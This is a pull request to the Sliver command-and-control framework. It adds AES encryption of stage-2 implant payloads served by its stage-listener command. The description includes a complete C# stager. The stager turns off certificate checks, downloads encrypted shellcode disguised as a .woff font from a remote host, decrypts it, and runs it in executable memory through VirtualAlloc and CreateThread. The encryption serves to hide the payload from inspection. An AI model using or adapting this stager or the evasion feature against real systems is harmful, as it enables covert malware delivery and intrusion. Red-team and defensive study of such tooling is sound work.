### PR TITLE
Added option to encrypt the stage via AES encryption

### DIFF
--- a/client/command/commands.go
+++ b/client/command/commands.go
@@ -476,6 +476,8 @@ func BindCommands(con *console.SliverConsoleClient) {
 			f.String("c", "cert", "", "path to PEM encoded certificate file (HTTPS only)")
 			f.String("k", "key", "", "path to PEM encoded private key file (HTTPS only)")
 			f.Bool("e", "lets-encrypt", false, "attempt to provision a let's encrypt certificate (HTTPS only)")
+			f.StringL("aes-encrypt-key", "", "encrypt stage with AES encryption key")
+			f.StringL("aes-encrypt-iv", "", "encrypt stage with AES encyption iv")
 		},
 		Run: func(ctx *grumble.Context) error {
 			con.Println()

--- a/client/command/jobs/stage.go
+++ b/client/command/jobs/stage.go
@@ -25,6 +25,7 @@ import (
 
 	"github.com/bishopfox/sliver/client/command/generate"
 	"github.com/bishopfox/sliver/client/console"
+	"github.com/bishopfox/sliver/client/prelude/util"
 	"github.com/bishopfox/sliver/protobuf/clientpb"
 	"github.com/desertbit/grumble"
 )
@@ -33,6 +34,8 @@ import (
 func StageListenerCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
 	profileName := ctx.Flags.String("profile")
 	listenerURL := ctx.Flags.String("url")
+	aesEncryptKey := ctx.Flags.String("aes-encrypt-key")
+	aesEncryptIv := ctx.Flags.String("aes-encrypt-iv")
 
 	if profileName == "" || listenerURL == "" {
 		con.PrintErrorf("Missing required flags, see `help stage-listener` for more info\n")
@@ -56,10 +59,37 @@ func StageListenerCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
 		con.PrintErrorf("Profile not found\n")
 		return
 	}
+
+	aesEncrypt := false
+	if aesEncryptKey != "" {
+		// check if aes encryption key is correct length
+		if len(aesEncryptKey)%16 != 0 {
+			con.PrintErrorf("Incorect length of AES Key\n")
+			return
+		}
+
+		// set default aes iv
+		if aesEncryptIv == "" {
+			aesEncryptIv = "0000000000000000"
+		}
+
+		// check if aes iv is correct length
+		if len(aesEncryptIv)%16 != 0 {
+			con.PrintErrorf("Incorect length of AES IV\n")
+			return
+		}
+
+		aesEncrypt = true
+	}
+
 	stage2, err := generate.GetSliverBinary(profile, con)
 	if err != nil {
 		con.PrintErrorf("%s\n", err)
 		return
+	}
+
+	if aesEncrypt {
+		stage2 = util.EncryptStage(stage2, aesEncryptKey, aesEncryptIv)
 	}
 
 	switch stagingURL.Scheme {
@@ -124,5 +154,10 @@ func StageListenerCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
 	default:
 		con.PrintErrorf("Unsupported staging protocol: %s\n", stagingURL.Scheme)
 		return
+	}
+
+	if aesEncrypt {
+		con.PrintInfof("AES KEY: %v\n", aesEncryptKey)
+		con.PrintInfof("AES IV: %v\n", aesEncryptIv)
 	}
 }

--- a/client/prelude/util/crypto.go
+++ b/client/prelude/util/crypto.go
@@ -47,6 +47,23 @@ func Encrypt(bites []byte) []byte {
 	return []byte(fmt.Sprintf("%x", cipherText))
 }
 
+func EncryptStage(bites []byte, AESKey string, AESIV string) []byte {
+	bites, err := pad(bites, aes.BlockSize)
+	if err != nil {
+		return make([]byte, 0)
+	}
+
+	aesKeyBytes := []byte(AESKey)
+	aesIVBytes := []byte(AESIV)
+
+	block, _ := aes.NewCipher(aesKeyBytes)
+	cipherText := make([]byte, aes.BlockSize+len(bites))
+	mode := cipher.NewCBCEncrypter(block, aesIVBytes)
+	mode.CryptBlocks(cipherText, bites)
+
+	return cipherText
+}
+
 //Decrypt a command
 func Decrypt(text string) string {
 	cipherText, _ := hex.DecodeString(text)


### PR DESCRIPTION
#### Card
Implemented AES encryption for stages when served via `stage-listener`

#### Details

Example usage:
```
stage-listener --url http://192.168.0.52:80 --profile win-shellcode --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
```

If `aes-encrypt-iv` is not set it defaults to `0000000000000000`.
After the stage generation is completed AES key and iv are displayed.

Example of C# (extended version of the [link](https://github.com/BishopFox/sliver/wiki/Stagers#custom-stagers))

``` csharp
using System;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;

namespace Sliver_stager
{
    class Program
    {
        private static string AESKey = "D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT";
        private static string AESIV = "8y/B?E(G+KbPeShV";
        private static string url = "http://192.168.0.52/test.woff";

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        public static void DownloadAndExecute()
        {
            ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;
            System.Net.WebClient client = new System.Net.WebClient();
            byte[] shellcode = client.DownloadData(url);
            shellcode = Decrypt(shellcode, AESKey, AESIV);
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x3000, 0x40);
            Marshal.Copy(shellcode, 0, addr, shellcode.Length);
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        private static byte[] Decrypt(byte[] ciphertext, string AESKey, string AESIV)
        {
            byte[] key = Encoding.UTF8.GetBytes(AESKey);
            byte[] IV = Encoding.UTF8.GetBytes(AESIV);

            using (Aes aesAlg = Aes.Create())
            {
                aesAlg.Key = key;
                aesAlg.IV = IV;
                aesAlg.Padding = PaddingMode.None;

                ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);

                using (MemoryStream memoryStream = new MemoryStream(ciphertext))
                {
                    using (CryptoStream cryptoStream = new CryptoStream(memoryStream, decryptor, CryptoStreamMode.Write))
                    {
                        cryptoStream.Write(ciphertext, 0, ciphertext.Length);
                        return memoryStream.ToArray();
                    }
                }
            }
        }

        public static void Main(String[] args)
        {
            DownloadAndExecute();
        }
    }
}
```